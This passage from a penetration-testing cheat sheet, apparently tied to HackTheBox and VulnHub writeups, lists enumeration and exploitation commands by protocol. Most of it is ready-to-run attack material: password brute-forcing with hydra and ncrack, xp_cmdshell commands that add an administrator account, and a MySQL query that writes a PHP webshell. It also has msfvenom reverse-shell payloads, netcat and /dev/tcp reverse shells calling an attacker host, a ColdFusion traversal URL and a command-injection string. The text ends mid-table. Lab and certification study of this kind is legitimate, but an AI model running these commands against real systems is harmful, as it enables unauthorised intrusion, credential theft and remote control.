<username> -P <password> hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-get / hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-head / nc -v -n -w1 <targetip> <targetport> ## netcat to grab banner nikto -o "[OUTPUT].txt" -p <targetport> -h <targetip> nmap -Pn -sV -sC -vvvvv -p<targetport> <targetip> -oA [OUTPUT] w3m -dump <targetip>/robots.txt wafw00f http://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall wafw00f https://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall whatweb <targetip>:<targetport> --color=never --log-brief="[OUTPUT].txt" ## identify web technology ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 2. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | | 3. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 4. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_ldap"></a> #### enumerate_proto_ldap [⇡](#enumerate) ```shell ldapsearch -x -s base -h <targetip> -p 389 ``` --- <a name="enumerate_proto_mssql"></a> #### enumerate_proto_mssql [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/mssql-default-userpass.txt -u -f <targetip> mssql hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mssql://<targetip> nmap --script=ms-sql-* --script-args mssql.instance-port=1433 <targetip> nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user anderson cooper /add" nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators anderson /add" nmap -vv -sV -Pn -p <targetport> --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa <targetip> ``` --- <a name="enumerate_proto_mysql"></a> #### enumerate_proto_mysql [⇡](#enumerate) ```shell nmap --script=mysql-* <targetip> bruteforce: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mysql://<targetip> nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv <targetip> create a reverse shell: select '<?php exec($_GET["cmd"]); ?>' from store into dumpfile '/var/www/https/blogblog/wp-content/uploads/shell.php' udf: if mysql is running as root AND /usr/lib/lib_mysqludf_sys.so file is present, we can privesc nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <targetip> -p <targetport> hydra -s <targetport> -C ./wordlists/mysql-default-userpass.txt -u -f <targetip> mysql ``` --- <a name="enumerate_proto_nfs"></a> #### enumerate_proto_nfs [⇡](#enumerate) ```shell nmap -sV --script=nfs-* <targetip> showmount -e <targetip> ``` --- <a name="enumerate_proto_oracle"></a> #### enumerate_proto_oracle [⇡](#enumerate) ```shell msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=<targetip> E msfcli auxiliary/scanner/oracle/sid_enum rhosts=<targetip> E tnscmd10g status -h <targetip> hydra -uf -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 oracle-listener ``` --- <a name="enumerate_proto_postgres"></a> #### enumerate_proto_postgres [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/postgres-default-userpass.txt -u -f <targetip> postgres hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 postgres ``` --- <a name="enumerate_proto_rdp"></a> #### enumerate_proto_rdp [⇡](#enumerate) ```shell perl /usr/share/sparta/scripts/rdp-sec-check.pl <targetip>:<targetport> ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<targetip> ``` --- <a name="enumerate_proto_rpc"></a> #### enumerate_proto_rpc [⇡](#enumerate) ```shell rpcinfo -p <targetip> ``` --- <a name="enumerate_proto_smb"></a> #### enumerate_proto_smb [⇡](#enumerate) ```shell locate all smb scripts on kali and run them to gather details: locate *.nse | grep smb try enum4linux to get open shares, permissions and local users: enum4linux -a <targetip> nbtscan -vhr <targetip> scans: nmap -p139,445 --script smb-vuln-* --script-args=unsafe=1 <targetip> nmap -p139,445 --script smb-enum-* --script-args=unsafe=1 <targetip> null sessions: bash -c "echo 'srvinfo' | rpcclient -U % <targetip>" groups: nmap -vv -p139,445 --script=smb-enum-groups <targetip> users: bash -c "echo 'enumdomusers' | rpcclient -U % <targetip>" admins: net rpc group members "Domain Admins" -U % -I <targetip> shares: nmap -vv -p139,445 --script=smb-enum-shares <targetip> sessions: nmap -vv -p139,445 --script=smb-enum-sessions <targetip> policies: nmap -vv -p139,445 --script=smb-enum-domains <targetip> version: use auxiliary/scanner/smb/smb_version bruteforce: use auxiliary/scanner/smb/smb_login bash -c "echo 'enumdomusers' | rpcclient <targetip> -U%" bash -c "echo 'srvinfo' | rpcclient <targetip> -U%" bash /usr/share/sparta/scripts/smbenum.sh <targetip> enum4linux <targetip> nbtscan -v -h <targetip> net rpc group members "Domain Admins" -I <targetip> -U% nmap -p<targetport> --script=smb-enum-domains <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-groups <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-sessions <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-shares <targetip> -vvvvv nmap -sV -Pn -vv -p <targetport> --script=smb-vuln* --script-args=unsafe=1 <targetip> python /usr/share/doc/python-impacket-doc/examples/samrdump.py <targetip> <targetport>/SMB smbclient -L <targetip> smbclient //<targetip>/admin$ -U john smbclient //<targetip>/ipc$ -U john smbclient //<targetip>/tmp smbclient \\<targetip>\ipc$ -U john winexe -U username //<targetip> "cmd.exe" --system ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smb_anonymous_access"></a> #### enumerate_proto_smb_anonymous_access [⇡](#enumerate) open shares, anonymous logins ```shell # connect to and explore smb share: smbclient -N -L \\\\<targetip> smbclient -N \\\\<targetip>\\$share # look for null sessions "allows sessions using username '', password ''", use smbclient to connect and explore smb share: enum4linux -a <targetip> smbclient -U "" //<targetip>/share$ (password: "") smbclient //<targetip>/share$ -U lazysysadmin -p 445 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smtp"></a> #### enumerate_proto_smtp [⇡](#enumerate) ```shell smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> # send email: swaks --to [email protected] --from [email protected] --server 192.168.92.167:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" ``` --- <a name="enumerate_proto_snmp"></a> #### enumerate_proto_snmp [⇡](#enumerate) ```shell snmpcheck -t <targetip> nmap -sU -p 161 --script=*snmp* <targetip> xprobe2 -v -p udp:161:open <targetip> use auxiliary/scanner/snmp/snmp_login use auxiliary/scanner/snmp/snmp_enum enumerate open ports, running services and applications: snmpwalk -v2c -c public <targetip> . snmp-check -t 5 -c public <targetip> scan using multiple community strings: echo public >community echo private >>community echo manager >>community for ip in $(seq 200 254); do echo 10.11.1.${ip}; done >ips onesixtyone -c community -i ips onesixtyone -c /usr/share/wordlists/dirb/small.txt <targetip> enumerate windows users: snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25 for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpwalk -v 1 -c $i 192.168.1.200; done | grep -e "Timeout" enumerate current windows processes: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2 enumerate windows open tcp ports: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3 enumerate installed software: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2 ``` --- <a name="enumerate_proto_sql"></a> #### enumerate_proto_sql [⇡](#enumerate) ```shell locate all sql scripts on kali and run them to gather details: locate *.nse | grep sql ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_sql_ssis_dtsconfig"></a> #### enumerate_proto_sql_ssis_dtsconfig [⇡](#enumerate) The `.dtsConfig` files are used by [SQL Server Integration Services (SSIS)](https://en.wikipedia.org/wiki/SQL_Server_Integration_Services) and can contain plaintext credentials for SQL users. ```shell cat *.dtsConfig ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_ssh"></a> #### enumerate_proto_ssh [⇡](#enumerate) ```shell authorized_keys: ssh-keygen -t rsa -b 2048 enter a custom filename copy contents of <filename>.pub to /home/<username>/.ssh/authorized_keys ssh -i <filename>.pub <username>@<targetip> ssh enum: msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.11.1.0/24 msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 254 msf auxiliary(scanner/ssh/ssh_enumusers) > run ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_telnet"></a> #### enumerate_proto_telnet [⇡](#enumerate) ```shell nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s <targetip> use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_version) > set THREADS 254 msf auxiliary(telnet_version) > run use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) > set BLANK_PASSWORDS false msf auxiliary(telnet_login) > set PASS_FILE passwords.txt msf auxiliary(telnet_login) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_login) > set THREADS 254 msf auxiliary(telnet_login) > set USER_FILE users.txt msf auxiliary(telnet_login) > set VERBOSE false msf auxiliary(telnet_login) > run ``` --- <a name="enumerate_proto_webdav"></a> #### enumerate_proto_webdav [⇡](#enumerate) ```shell default pass for xampp: wampp/xampp test uploading different file extensions: davtest -url http://10.11.1.10 test uploading different file extensions, with given creds: davtest -url http://10.11.1.10 -auth username:password remove files uploaded during test: davtest -cleanup create a reverse shell (asp file even if not allowed) connect to webdav share, bypass upload restrictions: cadaver http://10.11.1.10 mkdir temp cd temp put revshell.asp revshell.txt copy revshell.txt revshell.asp open nc to catch reverse shell connection browse webdav share and open uploaded file ``` --- <a name="exploit"></a> ### ⚙️ Exploit [🡑](#ttps) <a name="exploit_apache_tomcat"></a> #### exploit_apache_tomcat [⇡](#exploit) leverage Tomcat Web Application Manager to deploy a malicious .war file that spawns a reverse shell ```shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f war >backdoor.war # deploy war file through tomcat manager # start netcat listener and visit the link for uploaded jsp file to trigger webshell jar -xvf backdoor.war http://<targetip>:<targetport>/<.war filename w/o extension>/<.jsp filename in war archive w/ extension> ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="exploit_bash_reverseshell"></a> #### exploit_bash_reverseshell [⇡](#exploit) spawn a bash reverse shell to gain interactive access on the target system ```shell nc -nlvp <attackerport> rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attackerip> <attackerport> >/tmp/f ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="exploit_bof"></a> #### exploit_bof [⇡](#exploit) create a bof exploit to execute arbitrary code and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_cloudme_bof"></a> #### exploit_cloudme_bof [⇡](#exploit) the CloudMe version 1.11.12 is vulnerable to a buffer overflow that could be used to gain interactive access on the target system, possibly with elevated privileges ```shell msfvenom -p windows/shell_reverse_tcp lhost=<attackerip> lport=<attackerport> -b "\x00\x0a\x0d" -f python -a x86 --platform windows -e x86/shikata_ga_nai sudo nc -nlvp <attackerport> python 48389.py ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48389 --- <a name="exploit_cmdexec"></a> #### exploit_cmdexec [⇡](#exploit) execute arbitrary commands via a command execution vulnerability and gain interactive access on the target system ```shell nc -nlvp <attackerport> bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_coldfusion_dirtraversal"></a> #### exploit_coldfusion_dirtraversal [⇡](#exploit) coldfusion 8 is vulnerable to a directory traversal and exposes SHA1 hash of the user password ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://www.exploit-db.com/exploits/14641 --- <a name="exploit_coldfusion_scheduledtasks"></a> #### exploit_coldfusion_scheduledtasks [⇡](#exploit) coldfusion 8 allows to obtain remote shell by creating and executing a new scheduled task. this is a post-authentication vulnerability ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm http://<targetip>:<targetport>/CFIDE/administrator/settings/mappings.cfm # check the CFIDE logical path mapping to identify the file upload location, C:\ColdFusion8\wwwroot\CFIDE msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f raw >revshell.jsp nc -nlvp <attackerport> http://<targetip>:<targetport>/CFIDE/administrator/scheduler/scheduletasks.cfm # set url to revshell.jsp link # mark the save output to file option # set file to C:\ColdFusion8\wwwroot\CFIDE\revshell.jsp # run the scheduled task on demand to upload the revshell.jsp file http://<targetip>:<targetport>/CFIDE/revshell.jsp ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="exploit_command_injection"></a> #### exploit_command_injection [⇡](#exploit) certain webapps couldbe vulebrable to command injection via input text fields ```shell # submit escaped input: "\";whoami\n" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="exploit_credsreuse"></a> #### exploit_credsreuse [⇡](#exploit) Reuse credentials already found for a service to interact with another service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 5. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="exploit_defaultcreds"></a> #### exploit_defaultcreds [⇡](#exploit) Use default credentials to interact with a service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | 